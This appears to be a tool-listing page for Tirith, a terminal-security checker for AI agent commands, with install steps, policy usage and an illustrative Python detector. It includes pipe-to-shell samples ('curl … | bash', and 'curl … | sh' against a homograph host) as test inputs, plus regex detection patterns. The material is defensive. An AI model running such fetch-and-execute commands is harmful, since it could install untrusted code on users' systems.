# Tirith — Terminal Security for AI Agents

> Tirith flags risky terminal commands for developers and AI agents—pipe-to-shell, ANSI injection, homograph URLs, and data exfiltration—before execution.

## Quick Use

1. Install (macOS via Homebrew):

```bash
brew install sheeki03/tap/tirith
```

2. Create and validate a policy in your repo:

```bash
tirith policy init
tirith policy validate
```

3. Dry-run a risky command against your policy:

```bash
tirith policy test "curl https://example.com | bash"
```

## Intro

- **Best for:** teams running agent-driven shell commands who need guardrails against copy-paste supply-chain tricks
- **Works with:** macOS/Linux/Windows installs, YAML policy files, shell hooks, optional MCP server mode and setup guides for popular AI CLIs
- **Setup time:** 10–20 minutes

## Practical Notes

- README documents policy init/validate/test commands and a strictness model (paranoia 1–4).
- Install options include Homebrew, npm, Cargo, and OS packages; policy discovery looks for `.tirith/policy.yaml`.

## Where It Fits in an Agent Workflow

If you let an agent propose commands, Tirith can sit in front of execution:

- Use policy tests during planning to catch `curl | bash` and similar source-to-sink flows early.
- Keep a small allowlist (domains you trust) and blocklist (known bad) as code in your repo.
- In CI, apply a stricter scan profile (README shows scan profiles under policy) for configs like `.claude/*`, `mcp.json`, and other agent-control files.

## Practical “Do This, Not That”

- Prefer pinned installs over `curl | bash` whenever possible.
- If you must run a script installer, validate the URL (homograph/invisible unicode is a real class of attacks) and record the checksum or release tag you used.
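The checks named above (pipe-to-shell, ANSI escapes, invisible Unicode, homograph hosts) can be illustrated with a small pre-execution audit. This is an added example, not Tirith's code or rule set; `audit_command`, the finding labels, and the simplified regexes are assumptions made for illustration.

```python
import re
import unicodedata
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"|;&<>]+")
# A downloader whose output is piped straight into a shell interpreter.
PIPE_TO_SHELL_RE = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da|k)?sh\b")
ANSI_RE = re.compile(r"\x1b[\[\]]")  # ESC followed by a CSI or OSC introducer


def audit_command(command: str) -> list[str]:
    """Return sorted finding labels for one proposed shell command."""
    findings = set()
    if PIPE_TO_SHELL_RE.search(command):
        findings.add("pipe-to-shell")
    if ANSI_RE.search(command):
        findings.add("ansi-escape")
    # Category Cf covers zero-width and bidirectional-control characters.
    if any(unicodedata.category(ch) == "Cf" for ch in command):
        findings.add("invisible-unicode")
    for url in URL_RE.findall(command):
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            findings.add("malformed-url")
            continue
        if not host.isascii():
            findings.add("non-ascii-host")  # possible homograph
        if any(label.startswith("xn--") for label in host.split(".")):
            findings.add("punycode-host")   # review the decoded name
    return sorted(findings)


if __name__ == "__main__":
    # Constructed samples; the second host contains Cyrillic U+0430.
    samples = [
        "brew install sheeki03/tap/tirith",
        "curl -fsSL https://ex\u0430mple.com/install.sh | sh",
        "echo done\u200b",
    ]
    for cmd in samples:
        print(ascii(cmd), "->", audit_command(cmd))
```

An empty result means only that none of these four heuristics fired; it is not a statement that the command is safe.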
### FAQ

**Q: Does Tirith execute commands for me?**
A: It can validate and policy-test commands; the goal is to surface risk before you run them.

**Q: Where does the policy live?**
A: The README states it discovers `.tirith/policy.yaml` in your repo (walking up), or a user config path.

**Q: Can I tune strictness?**
A: Yes—policy parameters include a paranoia level and action overrides for escalation.

## Source & Thanks

> Source: https://github.com/sheeki03/tirith
> License: AGPL-3.0
> GitHub stars: 2,307 · forks: 80

---

Source: https://tokrepo.com/en/workflows/tirith-terminal-security-for-ai-agents
Author: Script Depot